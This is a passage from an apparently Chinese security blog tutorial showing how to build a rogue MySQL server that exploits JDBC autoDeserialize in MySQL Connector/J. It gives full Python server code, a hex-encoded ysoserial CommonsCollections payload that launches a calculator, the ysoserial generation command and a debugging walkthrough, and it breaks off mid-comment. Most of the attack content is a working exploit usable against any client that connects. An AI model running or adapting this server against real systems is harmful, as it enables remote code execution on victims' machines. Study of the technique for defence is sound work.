<p>首先是 <code>greeting</code> 数据包</p>
<p>构造恶意Mysql服务端的时候需要将MySQL Protocol复制粘贴过来</p>
<p><img src="/img/jdbc/j07.png" srcset="/img/loading.gif" lazyload></p>
<p>继续往下，需要编写Response包，也是把MySQL Protocol复制粘贴过来就可以</p>
<p><img src="/img/jdbc/j08.png" srcset="/img/loading.gif" lazyload></p>
<p>除了<code>SHOW SESSION STATUS</code>的返回包需要我们自己构造，其他的按照此方法构造数据包就可以，此处不再一一列举</p>
<h3 id="fakeMySQL构造"><a href="#fakeMySQL构造" class="headerlink" title="fakeMySQL构造"></a>fakeMySQL构造</h3><h4 id="部分代码构造"><a href="#部分代码构造" class="headerlink" title="部分代码构造"></a>部分代码构造</h4><p>除去<code>SHOW SESSION STATUS</code>的返回包以外，其他数据包构造的如下代码所示，可以先将其他部分的数据包构造搞清楚后，再进行<code>SHOW SESSION STATUS</code>数据包的构造</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">import</span> binascii<br><span class="hljs-keyword">import</span> <span class="hljs-type">socket</span><br><br><span class="hljs-variable">greeting</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;4a0000000a352e372e323600130000005623364e2121182c00fff7c00200ff811500000000000000000000594b096a7d56547301550952006d7973716c5f6e61746976655f70617373776f726400&quot;</span><br>responseOK = <span class="hljs-string">&quot;0700000200000002000000&quot;</span><br><br>def <span class="hljs-title function_">send_data</span><span class="hljs-params">(conn, data)</span>:<br>    print(<span class="hljs-string">&quot;[*] Sending the package : &#123;&#125;&quot;</span>.format(data))<br>    conn.send(binascii.a2b_hex(data))<br><br>def <span class="hljs-title function_">receive_data</span><span class="hljs-params">(conn)</span>:<br>    data = conn.recv(<span class="hljs-number">1024</span>)<br>    print(<span class="hljs-string">&quot;[*] Receiving the package : &#123;&#125;&quot;</span>.format(data))<br>    <span class="hljs-keyword">return</span> str(data).lower()<br><br>def <span class="hljs-title function_">run</span><span class="hljs-params">()</span>:<br>    <span class="hljs-keyword">while</span> True:<br>		<br>        conn, addr = sk.accept()<br>        send_data(conn, greeting)<br><br>        <span class="hljs-keyword">while</span> True:<br>            receive_data(conn)<br>            send_data(conn, responseOK)<br><br>            data = receive_data(conn)<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;session.auto_increment_increment&quot;</span> in data:<br>                payload = <span class="hljs-string">&quot;01000001142e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c21000c000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c21002d000000fd00001f00002a0000080364656600000014636f6c6c6174696f6e5f636f6e6e656374696f6e000c21002d000000fd00001f000022000009036465660000000c696e69745f636f6e6e656374000c21002a000000fd00001f00002900000a0364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000b03646566000000076c6963656e7365000c210009000000fd00001f00002c00000c03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000d03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000e03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f73697a65000c3f001500000008a00000000026000010036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000011036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000012036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000013036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001403646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000015036465660000000c776169745f74696d656f7574000c3f001500000008a00000000019010016013104757466380475746638047574663804757466380f757466385f756e69636f64655f63690f757466385f67656e6572616c5f63690e534554204e414d45532075746638033132300347504c01310831363737373231360236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce40653595354454d0f52455045415441424c452d524541440331323007000017fe000002000200&quot;</span><br>                send_data(conn,payload)<br>                data = receive_data(conn)<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;show warnings&quot;</span> in data:<br>                payload = <span class="hljs-string">&quot;01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000&quot;</span><br>                send_data(conn,payload)<br>                data = receive_data(conn)<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;set names&quot;</span> in data:<br>                send_data(conn, responseOK)<br>                data = receive_data(conn)<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;set character_set_results&quot;</span> in data:<br>                send_data(conn, responseOK)<br>                data = receive_data(conn)<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;@@session.autocommit&quot;</span> in data:<br>                payload = <span class="hljs-string">&quot;01000001012a0000020364656600000014404073657373696f6e2e6175746f636f6d6d6974000c3f000100000008800000000002000003013107000004fe000002000000&quot;</span><br>                send_data(conn,payload)<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;SHOW SESSION STATUS&quot;</span> in data:<br>                pass<br>            <span class="hljs-keyword">break</span><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:<br>    HOST = <span class="hljs-string">&quot;0.0.0.0&quot;</span><br>    PORT = <span class="hljs-number">3306</span><br>    #建立一个ipv4，TCP的socket连接<br>    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>    #当socket关闭后，本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间<br>    sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, <span class="hljs-number">1</span>)<br>    #绑定IP与端口<br>    sk.bind((HOST,PORT))<br>    #建立监听<br>    sk.listen(<span class="hljs-number">1</span>)<br><br>    print(<span class="hljs-string">&quot;start fake mysql server listening on &#123;&#125;:&#123;&#125;&quot;</span>.format(HOST, PORT))<br><br>    run()<br><br></code></pre></td></tr></table></figure>

<h4 id="SHOW-SESSION-STATUS响应包编写"><a href="#SHOW-SESSION-STATUS响应包编写" class="headerlink" title="SHOW SESSION STATUS响应包编写"></a>SHOW SESSION STATUS响应包编写</h4><p>想要自行去编写该响应包，需要对MySQL的私有协议有一些了解</p>
<p>从流量中看，<code>SHOW SESSION STATUS</code>属于request query报文，对于查询数据包的响应包分为以下四种：</p>
<ol>
<li>错误包（ERR Packet）</li>
<li>正确包（OK Packet）</li>
<li>Protocol::LOCAL_INFILE_Request</li>
<li>结果集（ProtocolText::Resultset）</li>
</ol>
<p>在这一部分中，我们返回的是结果集这类型的响应包，该类响应包结构如下图所示</p>
<p><img src="/img/jdbc/j09.png" srcset="/img/loading.gif" lazyload></p>
<p>结果集结构可以说分为五个数据段</p>
<ul>
<li>数据段1：说明下面的结果集有多少列</li>
<li>数据段2：列的定义</li>
<li>数据段3：EOF包</li>
<li>数据段4：行数据</li>
<li>数据段5：EOF包</li>
</ul>
<p>数据段的结构也是相似的。 长度（3字节） 序号（1字节） 协议数据（不同协议，数据不同）</p>
<ol>
<li>数据段1就可以写成<code>01 00 00 01 02</code>，前三字节表示数据长度为1，sequence id为1，最后一字节02表示有两列（这里说写成一列的化无法正常运行）</li>
<li>数据段2的定义比较复杂，我们直接那完整的数据进行分析</li>
</ol>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm"><span class="hljs-number">1</span>a<span class="hljs-number">000002036465660001630163016301630</span><span class="hljs-keyword">c</span><span class="hljs-number">3</span>f<span class="hljs-number">00</span>ffff<span class="hljs-number">0000</span>fcffff<span class="hljs-number">000000</span><br></code></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs java">1a <span class="hljs-number">00</span> <span class="hljs-number">00</span>  <span class="hljs-comment">//3字节表示长度（这个长度说的是协议的内容长度，不包括序号那一字节）</span><br><span class="hljs-number">02</span>        <span class="hljs-comment">//序号 因为是第二个数据字段</span><br><span class="hljs-number">03646566</span>  <span class="hljs-comment">//这个就是def的意思。</span><br><span class="hljs-number">00</span>        <span class="hljs-comment">//schema 协议 因为不使用就用00</span><br><span class="hljs-number">01</span> <span class="hljs-number">63</span>     <span class="hljs-comment">//table 因为我们使用列数据，就不需要名字了，下面几个都是任意字符。字符串第一字节是用来说明长度的。</span><br><span class="hljs-number">01</span> <span class="hljs-number">63</span>  	  <span class="hljs-comment">//org_table  01表示1字节，63是数据</span><br><span class="hljs-number">0163</span>      <span class="hljs-comment">//name  </span><br><span class="hljs-number">0163</span>      <span class="hljs-comment">//org_name</span><br>0c      filler  <span class="hljs-comment">// length of the following fields 总是0x0c</span><br>3f00   <span class="hljs-comment">//characterset  字符编码 003f是binary </span><br>ffff0000  column_length <span class="hljs-comment">//允许数据最大长度，就是我们行数据的最大长度。ffff</span><br>fc    <span class="hljs-comment">//column_type 这一列数据类型  fc表示blob  </span><br><span class="hljs-number">9000</span>    <span class="hljs-comment">//flags  9000用的官方的 poc可以运行。  看fnmsd的要大于128好像。</span><br><span class="hljs-number">00</span>          <span class="hljs-comment">//decimals</span><br><span class="hljs-number">0000</span>        <span class="hljs-comment">//filler_2</span><br></code></pre></td></tr></table></figure>

<ol start="3">
<li>EOF包加上就无法复现成功</li>
<li>数据段4就是POC了，POC其实和上面一样的。计算出长度（3字节）序号（1字节）行数据（行数据第一个字节是数据的长度）</li>
<li>最后加入一个EOF包</li>
</ol>
<p>这里我们使用ysoserial生成CC的POC</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">java -jar ysoserial CC7 <span class="hljs-string">&quot;calc&quot;</span> &gt; payload<br></code></pre></td></tr></table></figure>

<h4 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> binascii<br><span class="hljs-keyword">import</span> os<br><br>greeting_data=<span class="hljs-string">&quot;4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400&quot;</span><br>response_ok_data=<span class="hljs-string">&quot;0700000200000002000000&quot;</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">receive_data</span>(<span class="hljs-params">conn</span>):<br>    data = conn.recv(<span class="hljs-number">1024</span>)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[*] Receiveing the package : &#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(data))<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">str</span>(data).lower()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">send_data</span>(<span class="hljs-params">conn,data</span>):<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;[*] Sending the package : &#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(data))<br>    conn.send(binascii.a2b_hex(data))<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">get_payload_content</span>():<br>    <span class="hljs-comment">#file文件的内容使用ysoserial生成的 使用规则  java -jar ysoserial [CC7]  &quot;calc&quot; &gt; a </span><br>    file= <span class="hljs-string">r&#x27;payload&#x27;</span><br>    <span class="hljs-keyword">if</span> os.path.isfile(file):<br>        <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(file, <span class="hljs-string">&#x27;rb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>            payload_content = <span class="hljs-built_in">str</span>(binascii.b2a_hex(f.read()),encoding=<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;open successs&quot;</span>)<br><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;open false&quot;</span>)<br>        <span class="hljs-comment">#calc</span><br>        payload_content=<span class="hljs-string">&#x27;aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878&#x27;</span><br>    <span class="hljs-keyword">return</span> payload_content<br><br><span class="hljs-comment"># 主要逻辑</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">run</span>():<br><br>    <span class="hljs-keyword">while</span> <span class="hljs-number">1</span>:<br>        conn, addr = sk.accept()<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Connection come from &#123;&#125;:&#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(addr[<span class="hljs-number">0</span>],addr[<span class="hljs-number">1</span>]))<br><br>        <span class="hljs-comment"># 1.先发送第一个 问候报文</span><br>        send_data(conn,greeting_data)<br><br>        <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>            <span class="hljs-comment"># 登录认证过程模拟  1.客户端发送request login报文 2.服务端响应response_ok</span><br>            receive_data(conn)<br>            send_data(conn,response_ok_data)<br><br>            <span class="hljs-comment">#其他过程</span><br>            data=receive_data(conn)<br>            <span class="hljs-comment">#查询一些配置信息,其中会发送自己的 版本号</span><br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;session.auto_increment_increment&quot;</span> <span class="hljs-keyword">in</span> data:<br>                _payload=<span class="hljs-string">&#x27;01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000&#x27;</span><br>                send_data(conn,_payload)<br>                data=receive_data(conn)<br>            <span class="hljs-keyword">elif</span> <span class="hljs-string">&quot;show warnings&quot;</span> <span class="hljs-keyword">in</span> data:<br>                _payload = <span class="hljs-string">&#x27;01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000&#x27;</span><br>                send_data(conn, _payload)<br>                data = receive_data(conn)<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;set names&quot;</span> <span class="hljs-keyword">in</span> data:<br>                send_data(conn, response_ok_data)<br>                data = receive_data(conn)<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;set character_set_results&quot;</span> <span class="hljs-keyword">in</span> data:<br>                send_data(conn, response_ok_data)<br>                data = receive_data(conn)<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;show session status&quot;</span> <span class="hljs-keyword">in</span> data:<br>                mysql_data = <span class="hljs-string">&#x27;0100000102&#x27;</span><br>                mysql_data += <span class="hljs-string">&#x27;1a000002036465660001630163016301630c3f00ffff0000fc9000000000&#x27;</span><br>                mysql_data += <span class="hljs-string">&#x27;1a000003036465660001630163016301630c3f00ffff0000fc9000000000&#x27;</span><br>                <span class="hljs-comment"># 为什么我加了EOF Packet 就无法正常运行呢？？</span><br>                <span class="hljs-comment">#获取payload</span><br>                payload_content=get_payload_content()<br>                <span class="hljs-comment">#计算payload长度</span><br>                payload_length = <span class="hljs-built_in">str</span>(<span class="hljs-built_in">hex</span>(<span class="hljs-built_in">len</span>(payload_content)//<span class="hljs-number">2</span>)).replace(<span class="hljs-string">&#x27;0x&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>).zfill(<span class="hljs-number">4</span>)<br>                payload_length_hex = payload_length[<span class="hljs-number">2</span>:<span class="hljs-number">4</span>] + payload_length[<span class="hljs-number">0</span>:<span class="hljs-number">2</span>]<br>                <span class="hljs-comment">#计算数据包长度</span><br>                data_len = <span class="hljs-built_in">str</span>(<span class="hljs-built_in">hex</span>(<span class="hljs-built_in">len</span>(payload_content)//<span class="hljs-number">2</span> + <span class="hljs-number">4</span>)).replace(<span class="hljs-string">&#x27;0x&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>).zfill(<span class="hljs-number">6</span>)<br>                data_len_hex = data_len[<span class="hljs-number">4</span>:<span class="hljs-number">6</span>] + data_len[<span class="hljs-number">2</span>:<span class="hljs-number">4</span>] + data_len[<span class="hljs-number">0</span>:<span class="hljs-number">2</span>]<br>                mysql_data += data_len_hex + <span class="hljs-string">&#x27;04&#x27;</span> + <span class="hljs-string">&#x27;fbfc&#x27;</span>+ payload_length_hex<br>                mysql_data += <span class="hljs-built_in">str</span>(payload_content)<br>                mysql_data += <span class="hljs-string">&#x27;07000005fe000022000100&#x27;</span><br>                send_data(conn, mysql_data)<br>                data = receive_data(conn)<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;show warnings&quot;</span> <span class="hljs-keyword">in</span> data:<br>                payload = <span class="hljs-string">&#x27;01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000&#x27;</span><br>                send_data(conn, payload)<br>            <span class="hljs-keyword">break</span><br><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    HOST =<span class="hljs-string">&#x27;0.0.0.0&#x27;</span><br>    PORT = <span class="hljs-number">3309</span><br><br>    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>    <span class="hljs-comment">#当socket关闭后，本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间</span><br>    sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, <span class="hljs-number">1</span>)<br>    sk.bind((HOST, PORT))<br>    sk.listen(<span class="hljs-number">1</span>)<br><br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;start fake mysql server listening on &#123;&#125;:&#123;&#125;&quot;</span>.<span class="hljs-built_in">format</span>(HOST,PORT))<br><br>    run()<br></code></pre></td></tr></table></figure>

<p>测试一下，在脚本运行时是能看到正常的回显的，能正常收到包并发包，但是没有弹出计算器</p>
<p><img src="/img/jdbc/j10.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="调试分析"><a href="#调试分析" class="headerlink" title="调试分析"></a>调试分析</h3><p>来看一下为什么弹不出计算器</p>
<ul>
<li>在 <code>com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor#populateMapWithSessionStatusValues</code> 下个断点，开始调试分析</li>
</ul>
<p><img src="/img/jdbc/j11.png" srcset="/img/loading.gif" lazyload></p>
<p>往下跟，先运行查询语句 <code>SHOW SESSION STATUS</code>，接着调用了 <code>ResultSetUtil.resultSetToMap()</code></p>
<p><img src="/img/jdbc/j12.png" srcset="/img/loading.gif" lazyload></p>
<p>正常流程是<code>ResultSetUtil.resultSetToMap()</code> 调用了 <code>getObject()</code> 方法，第一处调用 <code>getObject()</code> 方法回返回 null，第二次调用时才会走到反序列化的代码逻辑里面</p>
<p>所以我们这里按下F7直接进入第二个getObject方法</p>
<p>这里就是我们在数据段2关于Binary和数据类型Blob设置的判断</p>
<p><img src="/img/jdbc/j14.png" srcset="/img/loading.gif" lazyload></p>
<p>下一步时关于一些获取配置集合的操作</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">if</span> (<span class="hljs-built_in">this</span>.connection.getPropertySet().getBooleanProperty(PropertyKey.autoDeserialize).getValue()) &#123;<br> 	<span class="hljs-type">Object</span> <span class="hljs-variable">obj</span> <span class="hljs-operator">=</span> data;<br><span class="hljs-comment">/**    </span><br><span class="hljs-comment">this.connection.getPropertySet()   </span><br><span class="hljs-comment"> 获取当前数据库连接对象（connection）的配置属性集合。</span><br><span class="hljs-comment"></span><br><span class="hljs-comment">.getBooleanProperty(PropertyKey.autoDeserialize)</span><br><span class="hljs-comment"> 从配置中取出名为 autoDeserialize 